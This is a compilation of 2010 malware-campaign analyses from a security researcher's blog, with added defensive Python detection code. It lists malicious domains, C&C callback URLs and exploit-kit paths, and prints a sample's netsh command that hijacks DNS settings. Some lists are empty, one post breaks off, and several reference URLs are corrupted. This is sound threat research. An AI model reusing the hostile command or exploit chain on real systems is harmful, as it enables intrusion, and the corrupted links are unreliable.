Although the takedown activities from last month may seem to have had a short-lived effect, now that they're not only back but are once again abusing EUROACCESS, the loss of OPSEC (operational security) did happen, just like it happened in the wake of the [7]TROYAK-AS takedown.

Let's dissect the currently ongoing campaign, and emphasize a second money mule recruitment campaign that's not just using a fast-flux infrastructure, but is also connected to hilarykneber@yahoo.com ([8]The Kneber botnet - FAQ).

Spamvertised and parked domains on 85.12.46.3; 85.12.46.2; 193.104.106.30 - AS34305, EUROACCESS Global Autonomous System are as follows:

starlingbusinessgroup.com - 212.150.164.201 - Email: tahli@yahoo.com (spamvertised separately from the campaign)

Newly introduced name servers: 


Name servers known from previous campaigns remain active, 
using AS34305: 


It's been a while since I came across a money mule recruitment campaign using fast-flux infrastructure ([9]Money Mule Recruiters use ASProx's Fast Fluxing Services) that's also currently being used by domains registered using the same emails as the original Hilary Kneber campaigns ([10]Celebrity-Themed Scareware Campaign Abusing DocStoc) from December, 2009, as well as related mule recruitment campaigns ([11]Dissecting an Ongoing Money Mule Recruitment Campaign) from February, 2010.
Moreover, one of the domains sharing the fast-flux infrastructure with the money mule recruitment site - asapfinancialgroup.com - Email: admin@asapfinancialgroup.com - was also profiled in last month's "[12]Zeus Crimeware/Client-Side Exploits Serving Campaign in the Wild".
The following ZeuS crimeware, client-side exploits serving, and malware phone back C&C domains all share the same fast-flux infrastructure:


Name servers of the fast-fluxed domains include: 


EUROACCESS have been notified; an update will be posted as soon as they take care of the campaign.

Related coverage of money laundering in the context 
of cybercrime: 

[22]Money Mule Recruitment Campaign Serving Client-Side Exploits

[23]Keeping Money Mule Recruiters on a Short Leash - Part Three

[24]Money Mule Recruiters on Yahoo!'s Web Hosting

[25]Dissecting an Ongoing Money Mule Recruitment Campaign

[26]Keeping Money Mule Recruiters on a Short Leash - Part Two

[27]Keeping Reshipping Mule Recruiters on a Short Leash

[28]Keeping Money Mule Recruiters on a Short Leash

[29]Standardizing the Money Mule Recruitment Process

[30]Inside a Money Laundering Group's Spamming Operations

[31]Money Mule Recruiters use ASProx's Fast Fluxing Services

[32]Money Mules Syndicate Actively Recruiting Since 2002

This post has been reproduced from [33]Dancho Danchev's 
blog. Follow him [34]on Twitter. 
Dissecting Northwestern Bank's Client-Side Exploits Serving Site Compromise (2010-04-12 12:03)

It's one thing to indirectly target a bank's reputation by brand-jacking it for phishing or malware serving purposes, and entirely another when the front page of the bank (NorthWesternBankOnline.com) itself is embedded with an iFrame leading to client-side exploits, to ultimately serve a copy of [1]Backdoor.DMSpammer.

• Go through an assessment of a similar incident from 2007 - [2]Bank of India Serving Malware

This is exactly what happened on Friday, with the front page of the [3]Northwestern Bank of Orange City and Sheldon, Iowa acting as an infection vector. And although the site is now clean, the compromise offers some interesting insights into the multitasking on behalf of some of the most prolific malware spreaders for Q1, 2010.

• Go through assessments of their previous campaigns: [4]Scareware, Sinowal, Client-Side Exploits Serving Spam Campaign in the Wild; [5]AS50215 Troyak-as Taken Offline, Zeus C&Cs Drop from 249 to 181; [6]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware; [7]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams; [8]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild; [9]Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild; [10]IRS/PhotoArchive Themed Zeus/Client-Side Exploits Serving Campaign in the Wild
How come? The iFrame domain used in the Northwestern Bank's campaign is parked on the very same IP (59.53.91.192 - AS4134, CHINA-TELECOM China Telecom) that is still active, and was profiled in last month's spamvertised "[11]Zeus Crimeware/Client-Side Exploits Serving Campaign in the Wild" campaign.

The iFrame embedded on the front page of Northwestern Bank's web site, mumukafes.net /trf/index.php - 59.53.91.192 - Email: mated@freemailbox.ru, redirects through the following directories, to ultimately attempt to serve client-side exploits through the copycat Phoenix Exploit Kit web malware exploitation kit:

- mumukafes.net /trf/index.php - 59.53.91.192 - Email: mated@freemailbox.ru

- sobakozgav.net /index.php - 59.53.91.192

- sobakozgav.net /tmp/newplayer.pdf - CVE-2009-4324

- sobakozgav.net /l.php?i=16

- sobakozgav.net /statistics.php

Parked on the same IP (59.53.91.192) are also the following domains, all of which have been seen serving client-side exploits in previous campaigns:


Moreover, there are also active [12]ZeuS C&Cs on the same IP - 59.53.91.192, with the following detection rates for the currently active binaries:

- exel.exe - [13]Trojan/Win32.Zbot.gen; Trojan-Spy.Win32.Zbot - Result: 32/38 (84.22 %)

- exe.exe - [14]Backdoor.DMSpammer - Result: 23/39 (58.97 %)

- svhost.exe - [15]Trojan.Win32.Swisyn; Trojan.Win32.Swisyn.acfo - Result: 33/38 (86.85 %)

- vot.exe - [16]Trojan.Spy.ZBot.EOR; TSPY_ZBOT.SMG - Result: 15/38 (39.48 %)
Detection rates for the campaign files obtained through Northwestern Bank's client-side exploit serving campaign:

- js.js - [17]Mal/ObfJS-CT; JS/Crypted.CV.gen - Result: 3/39 (7.7 %)

- newplayer.pdf - [18]Exploit.PDF-JS.Gen; Exploit:Win32/Pdfjsc.EP - Result: 22/39 (56.42 %)

- update.exe - [19]Backdoor.DMSpammer - Result: 24/39 (61.54 %)

The sampled update.exe phones back to the following 
locations: 

usrdomainn.net /n2/checkupdate.txt - 122.70.149.12, 
AS38356, TimeNet - Email: paulapruynel3@gmail.com 

usrdomainn.net /n2/tuktuk.php 

usrdomainn.net /n2/getemails.php 

usrdomainnertwesar.net /n2/getemails.php 

usrdomainnertwesar.net /n2/checkupdate.txt 

usrdomainnertwesar.net /n2/tuktuk.php 

AS38356, TimeNet is most recently seen in the migration of the money mule recruiters in "[20]Keeping Money Mule Recruiters on a Short Leash - Part Four", with tuktuk.php literally translated as herehere.php.

The site is now clean, however, the iFrame domains and ZeuS C&Cs remain active.

This post has been reproduced from [21]Dancho Danchev's blog. Follow him [22]on Twitter.

1. http://www.symantec.com/security_response/writeup.jsp?docid=2003-102911-0033-99

2. http://ddanchev.blogspot.com/2007/08/bank-of-india-serving-malware.html

3. http://sunbeltblog.blogspot.com/2010/04/florida-bank-compromised-serving.html

4. http://ddanchev.blogspot.com/2010/03/scareware-sinowal-client-side-exploits.html

5. http://ddanchev.blogspot.com/2010/03/as50215-troyak-as-taken-offline-zeus-c.html

6. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

7. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

8. http://ddanchev.blogspot.com/2010/02/photoarchive-crimewareclient-side.html

9. http://ddanchev.blogspot.com/2010/02/tax-report-themed-zeusclient-side.html

10. http://ddanchev.blogspot.com/2010/02/irsphotoarchive-themed-zeusclient-side.html

11. http://ddanchev.blogspot.com/2010/03/zeus-crimewareclient-side-exploits.html

12. https://zeustracker.abuse.ch/monitor.php?ipaddress=59.53.91.192

13. http://www.virustotal.com/analisis/38a320d9c28c427acl2092b60040756fe9d0b4def6461493e4bc52a0488226f0-1271014015

14. http://www.virustotal.com/analisis/b73ef467fcldafl2d3624cIffblal0090dbfdbffl34d63598fbll0cldd8f9cf5-1271014031

15. http://www.virustotal.com/analisis/8a59eal0462a2b5c054d536ff9ab2e9el7fa862ce5alc840c90865b9461cle0a-1271014059

16. http://www.virustotal.com/analisis/dl613734c2ef041316f265942a5bc2de8bafd6765763f56cbd61f3f9b5022d35-1271017419

17. http://www.virustotal.com/analisis/d273801bl4025db06797b!138a72ce75fa0a2a94e519de3fbd399bld686fa864-12710

18. http://www.virustotal.com/analisis/5b714bc0f68c58fbb5a35b
13864

19. http://www.virustotal.com/analisis/b73ef467fcldafl2d3624c
13883

20. http://ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short.html

21. http://ddanchev.blogspot.com/
Copyright Violation Alert Themed Ransomware in the Wild (2010-04-12 19:51)

UPDATED: Wednesday, April 28, 2010: The universal license code required in the "Enter a previously purchased license code" window is RFHM2-TPX47-YD6RT-H4KDM

The copyright violation alert themed ransomware campaign ([1]Copyright violation alert ransomware in the wild; [2]ICPP Copyright Foundation is Fake) is not just a novel approach for extortion of the highest amount of money seen in ransomware variants so far, but also offers interesting clues into the multitasking mentality of the cybercriminals whose campaigns have already been profiled.

The bogus ICPP Foundation (icpp-online.com - 193.33.114.77 - Email: ovenersbox@yahoo.com) describes itself as:

"We are a law firm which specialises in assisting intellectual property rights holders exploit and enforce their rights globally. Illegal file sharing costs the creative industries billions of pounds every year. The impact of this is huge, resulting in job losses, declining profit margins and reduced investment in product development. Action needs to be taken and we believe a coordinated effort is needed now, before irreparable damage is done.

We have developed effective and unique methods for organisations to enforce their intellectual rights. By working effectively with forensic IT experts, law firms and anti-piracy organisations, we seek to eliminate the illegal distribution of copyrighted material through our revolutionary business model. Whilst many companies offer anti-piracy measures, these are often costly and ineffective. Our approach is quite the opposite, it generates revenue for rights holders and effectively decreases copyright infringement in a measurable and sustainable way. We offer high quality advice and excellent client care by delivering a thorough and reliable service. If you are interested in our services, please contact us for a no obligation consultation."

[3]Responding to the same IP (193.33.114.77) are also:

green-stat.com - Email: tahli@yahoo.com

media-magnats.com - Email: tahli@yahoo.com

Where do we know the tahli@yahoo.com email from? From "[4]The Koobface Gang Wishes the Industry "Happy Holidays"", where it was used to register Zeus C&Cs as well as money mule recruitment domains; from "[5]Money Mule Recruitment Campaign Serving Client-Side Exploits", where it was used to register the client-side exploit serving mule recruitment site; and most recently from "[6]Keeping Money Mule Recruiters on a Short Leash - Part Four", where it was used in another mule recruitment site registration.
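The cross-check used throughout these posts (which domains share a registrant email, a hosting IP or a name server, in the money mule Part Four post above and in the tahli@yahoo.com pivot here) can be modelled as a graph walk. This is an added example, not code from the original posts; every record in it is constructed placeholder data, not a real indicator.

```python
"""Infrastructure pivoting over domain registration records.

Added example, not code from the original posts: the posts link campaigns
by asking which domains share a registrant e-mail, a hosting IP or a name
server. This models that cross-check as a small graph walk. All records
below are constructed sample data with placeholder values, not real
indicators.
"""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Record:
    domain: str
    ip: str
    email: str
    nameserver: str


# Constructed sample registrations (placeholder names and RFC 5737 test IPs).
RECORDS = [
    Record("mule-recruit-a.example", "203.0.113.10", "reg1@example.net", "ns1.ff-one.example"),
    Record("mule-recruit-b.example", "203.0.113.10", "reg2@example.net", "ns1.ff-one.example"),
    Record("scareware-c.example", "198.51.100.7", "reg1@example.net", "ns1.other.example"),
    Record("crimeware-d.example", "198.51.100.8", "reg3@example.net", "ns1.ff-one.example"),
    Record("unrelated-e.example", "192.0.2.44", "reg9@example.net", "ns1.isp.example"),
]


def attributes(rec):
    """The three pivotable attributes of a record, as typed node names."""
    return ("ip:" + rec.ip, "email:" + rec.email.lower(), "ns:" + rec.nameserver.lower())


def build_graph(records):
    """Bipartite graph: domain nodes on one side, attribute nodes on the other.
    The type prefix keeps an IP, an e-mail and a domain from ever colliding."""
    graph = defaultdict(set)
    for rec in records:
        dom = "domain:" + rec.domain.lower()
        for attr in attributes(rec):
            graph[dom].add(attr)
            graph[attr].add(dom)
    return graph


def pivot(graph, seed, max_pivots=0):
    """Breadth-first walk from a seed node, returning the domains reached.

    max_pivots=0 gives only domains registered directly with the seed
    attribute; each further pivot also follows attributes shared by the
    domains found so far. None walks the whole connected component."""
    # Domains sit at odd depths: seed -> domain (1) -> attribute (2) -> domain (3) ...
    limit = None if max_pivots is None else 2 * max_pivots + 1
    seen = {seed}
    frontier = deque([(seed, 0)])
    domains = set()
    while frontier:
        node, depth = frontier.popleft()
        if node.startswith("domain:"):
            domains.add(node[len("domain:"):])
        if limit is not None and depth >= limit:
            continue
        for nxt in graph[node]:
            if nxt not in seen:
                seen.add(nxt)
                frontier.append((nxt, depth + 1))
    return domains


def clusters(graph):
    """Connected components as sets of domains: every domain in a set is tied
    to the others by some chain of shared registrant, IP or name server."""
    remaining = {n for n in graph if n.startswith("domain:")}
    out = []
    while remaining:
        comp = pivot(graph, next(iter(remaining)), max_pivots=None)
        out.append(comp)
        remaining -= {"domain:" + d for d in comp}
    return out


def shared_attributes(records):
    """Attributes used by more than one domain, each with its sorted domains."""
    by_attr = defaultdict(set)
    for rec in records:
        for attr in attributes(rec):
            by_attr[attr].add(rec.domain.lower())
    return {a: sorted(d) for a, d in by_attr.items() if len(d) > 1}


if __name__ == "__main__":
    g = build_graph(RECORDS)
    print("direct registrations:", sorted(pivot(g, "email:reg1@example.net")))
    print("one pivot out:", sorted(pivot(g, "email:reg1@example.net", max_pivots=1)))
    for attr, doms in shared_attributes(RECORDS).items():
        print(attr, "->", doms)
```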

What's particularly interesting about the ransomware variant is the fact that it has been localized to the following languages: Czech, Danish, Dutch, English, French, German, Italian, Portuguese, Slovak and Spanish, as well as the fact that it will attempt to build its torrents list from actual torrent files it is able to locate within the victim's hard drive.

Detection rates for the ransomware:

- mm.exe - [7]Win32/Adware.Antipiracy - Result: 2/39 (5.13 %)

- iqmanager.exe - [8]Rogue:W32/DotTorrent.A - Result: 5/39 (12.83 %)

- uninstall.exe - [9]Reser.Reputation.1 - Result: 1/39 (2.57 %)

Upon execution, the sample phones back to 91.209.238.2/m5install/774/1 (AS48671, GROZA-AS Cyber Internet Bunker) with the actual affiliate ID "afid=774" found in the settings.ini file. Active on the same IP are also related phone back directories from different campaigns:

91.209.238.2/r2ne winstall/freemen/1
91.209.238.2/r2ne winstall/02937/1
91.209.238.2/r2 hit/7/0/0

This is perhaps the first recorded case of cybercriminals ignoring the basics of micro-payments, and emphasizing profit margins by attempting to extort the amount of $400.
Related ransomware posts:

[10]Mac OS X SMS ransomware - hype or real threat?

[11]iHacked: jailbroken iPhones compromised, $5 ransom demanded

[12]New LoroBot ransomware encrypts files, demands $100 for decryption

[13]New ransomware locks PCs, demands premium SMS for removal

[14]Scareware meets ransomware: "Buy our fake product and we'll decrypt the files"

[15]Who's behind the GPcode ransomware?

[16]How to recover GPcode encrypted files?

[17]SMS Ransomware Displays Persistent Inline Ads

[18]SMS Ransomware Source Code Now Offered for Sale

[19]3rd SMS Ransomware Variant Offered for Sale

[20]4th SMS Ransomware Variant Offered for Sale

[21]5th SMS Ransomware Variant Offered for Sale

[22]6th SMS Ransomware Variant Offered for Sale

This post has been reproduced from [23]Dancho Danchev's 
blog. Follow him [24]on Twitter. 
iPhone Unlocking Themed Malware Campaign Spamvertised (2010-04-14 20:20)
UPDATED: Sunday, April 18, 2010: The folks at [1]EmergingThreats pinged me on the fact that immediately after the brief assessment went public, the cybercriminals moved iphone-iphone.info to 174.37.172.68 (SoftLayer Technologies Inc.). Currently responding to the same IP are also the following domains known to have been connected with previous malware campaigns - startexag.com - Email: venterprize@gmail.com; exposingpics.com, and animezhd.com.

Researchers from [2]BitDefender are reporting on a currently spamvertised malware campaign, using a "Unlock, Jailbrake and "hack"tivate iPhone 3.1.3" theme.

The spamvertised domain iphone-iphone.info - 188.210.236.181 - Email: iphone-iphone.info@protecteddomainservices.com, is enticing the end user into downloading the malware from pepd.org/blackra1n.exe - 188.210.236.109 - Email: pepd.org@protecteddomainservices.com.
Detection rate: blackra1n.exe - [3]Trojan.BAT.AACL - Result: 10/40 (25 %), with the malware itself attempting to change the default DNS settings on the infected hosts to the following IP - 188.210.236.250 (188-210-236-250.hotnet.ro), AS39443, HOTNET-AS SC Hot Net SRL Baia de Aries, Nr 3, Bl 5B, Sc A, Ap 39, Bucuresti, 6.

- Creates the following registry entry in an attempt to change default DNS settings:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{5D19E473-BE30-416B-B5C7-D8A091C41D2F} "NameServer" = 188.210.236.250

- Creates Process - Filename () Command Line: (C:\WINDOWS\system32\NETSH.EXE interface ip set dns "Local Area Connection" static 188.210.236.250) As User: () Creation Flags: (CREATE_DEFAULT_ERROR_MODE CREATE_SUSPENDED)

- Creates Process - Command Line: (interface ip set dns "Wireless Network Connection" static 188.210.236.250) As User: () Creation Flags: (CREATE_DEFAULT_ERROR_MODE CREATE_SUSPENDED)
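The two artefacts in the sandbox output above, the per-interface NameServer registry write and the netsh "interface ip set dns ... static" command, are exactly what a defender can alert on in process and registry telemetry. The following is an added example, not code from the original post: it parses constructed log lines of both shapes and flags any resolver that is not on an assumed organisational allow-list (the log line format, the allow-list and every IP in it are placeholders).

```python
"""Flagging DNS-resolver changes in process and registry telemetry.

Added example, not from the original post: the sandbox output shows the
sample rewriting the per-interface NameServer registry value and running
netsh "interface ip set dns ... static <ip>". This parses constructed log
lines of both shapes and flags any resolver outside an allow-list. The log
line format, the allow-list and all IPs below are assumptions/placeholders.
"""
import ipaddress
import re
from dataclasses import dataclass

# Assumed allow-list: resolvers the organisation actually operates (placeholders).
ALLOWED_RESOLVERS = {"192.0.2.53", "192.0.2.54"}

# netsh interface ip|ipv4 set dns|dnsservers [name=]"<iface>" [source=]static [address=]<ip>
NETSH_RE = re.compile(
    r'netsh(?:\.exe)?\b.*?\binterface\s+ip(?:v4)?\s+set\s+dns(?:servers)?\s+'
    r'(?:name=)?(?:"(?P<qiface>[^"]+)"|(?P<iface>\S+))\s+'
    r'(?:source=)?static\s+(?:addr(?:ess)?=)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})',
    re.IGNORECASE,
)

# ...\Tcpip\Parameters\Interfaces\{GUID} "NameServer" = <ip>[,<ip>...]
REG_RE = re.compile(
    r'Tcpip\\Parameters\\Interfaces\\(?P<iface>\{[0-9A-Fa-f-]+\})\s*'
    r'"?NameServer"?\s*=\s*"?(?P<ips>[\d.,\s]+?)"?\s*$',
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DnsChange:
    source: str      # "netsh" or "registry"
    interface: str   # adapter name or interface GUID
    resolver: str    # the DNS server that was configured
    allowed: bool    # True only if it is a valid IP on the allow-list


def _change(source, iface, ip, allowed):
    try:
        ipaddress.ip_address(ip)   # rejects e.g. 999.1.1.1 that the regex lets through
        valid = True
    except ValueError:
        valid = False
    return DnsChange(source, iface, ip, valid and ip in allowed)


def parse_line(line, allowed=ALLOWED_RESOLVERS):
    """Return every DNS change recorded on one log line (empty list if none)."""
    changes = []
    m = NETSH_RE.search(line)
    if m:
        changes.append(_change("netsh", m.group("qiface") or m.group("iface"),
                               m.group("ip"), allowed))
    m = REG_RE.search(line)
    if m:
        # NameServer may hold a comma- or space-separated list; check each entry.
        for ip in re.split(r"[,\s]+", m.group("ips").strip()):
            if ip:
                changes.append(_change("registry", m.group("iface"), ip, allowed))
    return changes


def suspicious_changes(lines, allowed=ALLOWED_RESOLVERS):
    """All changes that point a host at a resolver not on the allow-list."""
    return [c for line in lines for c in parse_line(line, allowed) if not c.allowed]


# Constructed sample lines modelled on the sandbox report above; 198.51.100.250
# stands in for a rogue resolver, 192.0.2.53 for a legitimate one.
SAMPLE_LOG = [
    r'HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces'
    r'\{5D19E473-BE30-416B-B5C7-D8A091C41D2F} "NameServer" = 198.51.100.250',
    r'Creates Process - C:\WINDOWS\system32\NETSH.EXE interface ip set dns '
    r'"Local Area Connection" static 198.51.100.250',
    r'Creates Process - C:\WINDOWS\system32\NETSH.EXE interface ip set dns '
    r'"Wireless Network Connection" static 198.51.100.250',
    r'Creates Process - C:\Windows\system32\netsh.exe interface ipv4 set dnsservers '
    r'name="Ethernet" source=static address=192.0.2.53',
    r'Creates Process - C:\Windows\system32\ipconfig.exe /flushdns',
]

if __name__ == "__main__":
    for c in suspicious_changes(SAMPLE_LOG):
        print(f"[{c.source}] {c.interface}: resolver set to {c.resolver} (not allow-listed)")
```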

From Romania, with DNS changing malware.

This post has been reproduced from [4]Dancho Danchev's blog. Follow him [5]on Twitter.

1. http://www.emergingthreats.net/

2. http://www.malwarecity.com/blog/iphone-unlocking-tricks-get-pcs-into-trouble-791.html

3. http://www.virustotal.com/analisis/f99906a458042a4caf5fc07193fb54c290c55560c28c35ba78b5a95bldfe0fe8-1271267435

4. http://ddanchev.blogspot.com/

5. http://twitter.com/danchodanchev


Facebook FarmTown Malvertising Campaign Courtesy of the Koobface Gang (2010-04-16 19:03)
Earlier this week, another malvertising campaign affected a 
popular community, in the face of Facebook's FarmTown. 

You have to analyze, and cross-check it to believe it. 

Key summary points: 

• the email test@now.net.cn used to register all the domains involved in the malvertising campaign, is exclusively used by the Koobface gang for numerous scareware registrations seen -

a 
Dissecting the WordPress Blogs Compromise at Network Solutions (2010-04-18 23:31)

UPDATED: Network Solutions [1]issued an update to the situation.

The folks at Sucuri Security have posted an update on [2]the reemergence of mass site compromises at Network Solutions, following [3]last week's WordPress attack.

What has changed since last week's campaign? Several new domains were introduced, including new phone back locations, with the majority of new domains once again parked on the same IP as they were last week - 64.50.165.169 - AS15244, LUNARPAGES proxy aut-num for Lunarpages by MZIMA.


The exploitation chain of the currently embedded domain is as follows:

- corpadsinc.com /grep/?spl=3&br=MSIE&vers=7.0&s=

- corpadsinc.com /grep/soc.php

- corpadsinc.com /grep/load.php?spl=ActiveX pack

- corpadsinc.com /grep/load.php?spl=pdf 2020

- corpadsinc.com /grep/load.php?spl=javal

- corpadsinc.com /grep/j2 079.jar

Detection rates for some of the obtained exploits:

- update.vbe - [4]VBS:Encrypted-gen; Trojan-Downloader.VBS.Agent.yw - Result: 11/40 (27.5 %)

- j2 079.jar - [5]Exploit.Java.29; Exploit.Java.CVE-2009-3867.c; JAVA/Byteverify.O - Result: 5/40 (12.5 %)
Responding to 64.50.165.169 - AS15244, LUNARPAGES proxy aut-num for Lunarpages by MZIMA are also:


Upon successful exploitation from corpadsinc.com the campaign drops load.exe - [6]Trojan:Win32/Meredrop; Trojan.Win32.Sasfis.a (v) - Result: 7/40 (17.50 %).

The sample load.exe also phones back to the following locations:

- nonstopacc.com/tmp/bb.php?v=200&id=130306319&b=7231522200&tm=8 - 188.124.16.95 - Email: alex1978a@bigmir.net

- nonstopacc.com/tmp/bb.php?v=200&id=130306319&tid=6&b=7231522200&r=1&tm=9

- 188.124.16.96/blackout_dem.exe

Detection rate for blackout_dem.exe - [7]Trojan-Dropper - Result: 7/40 (17.5 %), which phones back to mazcostrol.com/inst.php?aid=blackout - 188.124.16.103 - Email: alex1978a@bigmir.net.

Interestingly, the sample attempts to install a Firefox add-on in the following way: %ProgramFiles%\Mozilla Firefox\extensions\{8CE11043-9A15-4207-A565-0C94C42D590D}\chrome\content\timer.xul - MD5: 963136ADAA2B1C823F6C0E355800CE02, detected by different vendors as IRC/Flood.gen.h or TROJ_BUZUS.ZYX.

It's also worth pointing out that the campaign's admin panel is pointing to a third-party, cybercrime-friendly IP that's currently offline - corpadsinc.com/grep/stats.php -> HTTP/1.1 302 Found at 217.23.14.25, AS49981, WorldStream = Transit imports = -CAIW.
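A log-side check for the chain above, as an added example that is not part of the original post: it maps proxy-log URLs onto the stages the post lists (the /grep/ landing page, load.php?spl=..., the .jar stage, the bb.php phone-home, the second-stage .exe and the inst.php check-in) and flags clients that fetched an exploit stage and later phoned home. The log line format, timestamps and client addresses are constructed; the hosts, paths and query parameters are the ones the post lists.

```python
"""Stage classifier for the corpadsinc.com drive-by chain described above.

Added example, not code from the original post. The log format and the
sample lines are constructed; hosts, paths and query parameters are the
ones the post lists.
"""
from urllib.parse import parse_qs, urlsplit

# Hosts and IPs named in the post; in practice this set is fed from intel.
KNOWN_HOSTS = {
    "corpadsinc.com", "nonstopacc.com", "mazcostrol.com",
    "188.124.16.95", "188.124.16.96", "188.124.16.103",
}

# Exploitation first, then the dropped load.exe phoning home and fetching
# a second stage: that ordering is what likely_infected() looks for.
EXPLOIT_STAGES = {"exploit-select", "java-payload"}
POST_EXPLOIT_STAGES = {"phone-home", "second-stage", "installer-checkin"}


def classify(url):
    """Map one URL to a (stage, detail) tuple, or None if not of interest."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = parts.hostname or ""
    path = parts.path
    qs = parse_qs(parts.query)
    if host not in KNOWN_HOSTS:
        return None
    if path == "/grep/load.php":
        # load.php?spl=<exploit> selects which exploit is served
        return ("exploit-select", ",".join(qs.get("spl", ["?"])))
    if path.startswith("/grep/") and path.endswith(".jar"):
        return ("java-payload", path.rsplit("/", 1)[-1])
    if path == "/grep/soc.php":
        return ("browser-probe", "")
    if path == "/grep/" and "spl" in qs:
        # the landing page carries the browser fingerprint (br=, vers=)
        return ("landing", "br=" + qs.get("br", [""])[0])
    if path.endswith("/bb.php") and {"v", "id", "b"}.issubset(qs):
        return ("phone-home", "id=" + qs["id"][0])
    if path.lower().endswith(".exe"):
        return ("second-stage", path.rsplit("/", 1)[-1])
    if path.endswith("/inst.php") and "aid" in qs:
        return ("installer-checkin", "aid=" + qs["aid"][0])
    return ("known-host", path)


def scan_log(lines):
    """Parse '<timestamp> <client> <method> <url>' lines; hits per client."""
    hits = {}
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _method, url = fields[:4]
        found = classify(url)
        if found is not None:
            hits.setdefault(client, []).append((ts, found[0], found[1]))
    return hits


def likely_infected(hits):
    """Clients that fetched an exploit stage and afterwards phoned home."""
    infected = set()
    for client, events in hits.items():
        stages = [stage for _, stage, _ in events]
        exploit_at = [i for i, s in enumerate(stages) if s in EXPLOIT_STAGES]
        callback_at = [i for i, s in enumerate(stages) if s in POST_EXPLOIT_STAGES]
        if exploit_at and callback_at and min(exploit_at) < max(callback_at):
            infected.add(client)
    return infected


# Constructed proxy-log excerpt (timestamps and client IPs are made up).
SAMPLE_LOG = [
    "2010-04-18T10:00:01 10.0.0.5 GET http://corpadsinc.com/grep/?spl=3&br=MSIE&vers=7.0&s=",
    "2010-04-18T10:00:02 10.0.0.5 GET http://corpadsinc.com/grep/soc.php",
    "2010-04-18T10:00:03 10.0.0.5 GET http://corpadsinc.com/grep/load.php?spl=java1",
    "2010-04-18T10:00:04 10.0.0.5 GET http://corpadsinc.com/grep/j2079.jar",
    "2010-04-18T10:00:09 10.0.0.5 GET http://nonstopacc.com/tmp/bb.php?v=200&id=130306319&b=7231522200&tm=8",
    "2010-04-18T10:00:10 10.0.0.5 GET http://188.124.16.96/blackout_dem.exe",
    "2010-04-18T10:00:12 10.0.0.5 GET http://mazcostrol.com/inst.php?aid=blackout",
    "2010-04-18T10:01:00 10.0.0.7 GET http://corpadsinc.com/grep/?spl=3&br=MSIE&vers=7.0&s=",
    "2010-04-18T10:01:05 10.0.0.7 GET http://www.example.com/index.html",
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for client, events in hits.items():
        print(client, [f"{stage}({detail})" for _, stage, detail in events])
    print("likely infected:", sorted(likely_infected(hits)))
```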

The bottom line - although [8]Network Solutions criticized the [9]media last week for blaming this [10]on Network Solutions, or [11]WordPress itself, the company should realize that, for the sake of its reputation, it should always apply the following mentality - "protect the end user from himself" - when offering any of its services.

Related WordPress security resources:

[12]20 WordPress Security Plug-ins And Tips To Keep Hackers Away

[13]11 Best Ways to Improve WordPress Security

[14]20+ Powerful WordPress Security Plugins and Some Tips and Tricks

This post has been reproduced from [15]Dancho Danchev's blog. Follow him [16]on Twitter.

1. http://blog.networksolutions.com/2010/we-feel-your-pain-and-are-working-hard-to-fix-this/

2. http://blog.sucuri.net/2010/04/network-solutions-hacked-again.html

3. http://blog.sucuri.net/2010/04/network-solutions-hacked-again.html

4. http://www.virustotal.com/analisis/1486cf5ccaa9d4539b8743c196ccb448ca4077ccfefadb745468a4c43f889f23-1271624610

5. http://www.virustotal.com/analisis/18dbae8296e1274259edf49d0e35c1b911c56ad1021ef5ca6a5f49b9b915c2db-1271624626

6. http://www.virustotal.com/analisis/9e4edc0064249f2cd5cfcb897a6c66a4ea3b9955e444d14b457e6afabf16df15-1271616768

7. http://www.virustotal.com/analisis/5c84af8ec355cc2d53491426810c2e15579092f85f0d27248e13860476c76671-1271624608

8. http://blog.networksolutions.com/2010/alert-WordPress-blog-network-solutions/

9. http://blog.networksolutions.com/2010/update-word-press-issue-fixed/

10. http://blog.networksolutions.com/2010/update-word-press-issue-fixed/

11. http://wordpress.org/development/2010/04/file-permissions/

12. http://blog.taragana.com/index.php/archive/20-wordpress-security-plug-ins-and-tips-to-keep-hackers-away/

13. http://www.problogdesign.com/wordpress/11-best-ways-to-improve-wordpress-security/

14. http://speckyboy.com/2009/09/22/20-powerful-wordpress-security-plugins-and-some-tips-and-tricks/

15. http://ddanchev.blogspot.com/

16. http://twitter.com/danchodanchev
The DNS Infrastructure of the Money Mule Recruitment Ecosystem (2010-04-20 18:46)

What's the most static element of the vibrant money mule recruitment ecosystem? It's the DNS infrastructure that the cybercriminals behind the campaigns repeatedly use to push new scams.

This post aims to expose the name servers involved and the associated ASs, using the research previously conducted on their recruitment campaigns and their affiliations with multiple other cybercrime activities.

Moreover, its main objective is to emphasize the fact that cybercrime should stop being treated as a country/region-specific problem; instead it should be treated as an international problem, with each and every country having its own share of cybercrime activity.

• "The whole is greater than the sum of its parts" - [1]Aristotle

With money mule recruitment available as-a-service ([2]Standardizing the Money Mule Recruitment Process), the post will only detail the activities of what's referred to as a "mule recruitment syndicate", in short, one of the most prolific syndicates with direct connections to numerous related cybercrime campaigns profiled over the past 6 months.

What makes an impression is the geographical distribution of the name servers. 11 of them are based in the Netherlands, another 11 are based in China, followed by 11 more based in the United States. Here's the list of the related ASs and their occurrences:

• AS34305, EUROACCESS Global Autonomous System - The Netherlands - 11 name servers

• AS38356, TimeNet - China - 11 name servers

• AS46664, VolumeDrive - United States - 11 name servers

• AS30517, Great Lakes Comnet, Inc. - United States - 9 name servers

• AS32097, RoadRunner RR-RC-Wholesale Internet, Inc.-KansasCity - United States - 9 name servers

• AS29182, ISPSYSTEM-AS ISPsystem Autonomous System - Belgium - 8 name servers

• AS31103, KEYWEB-AS Keyweb AG - Germany - 1 name server
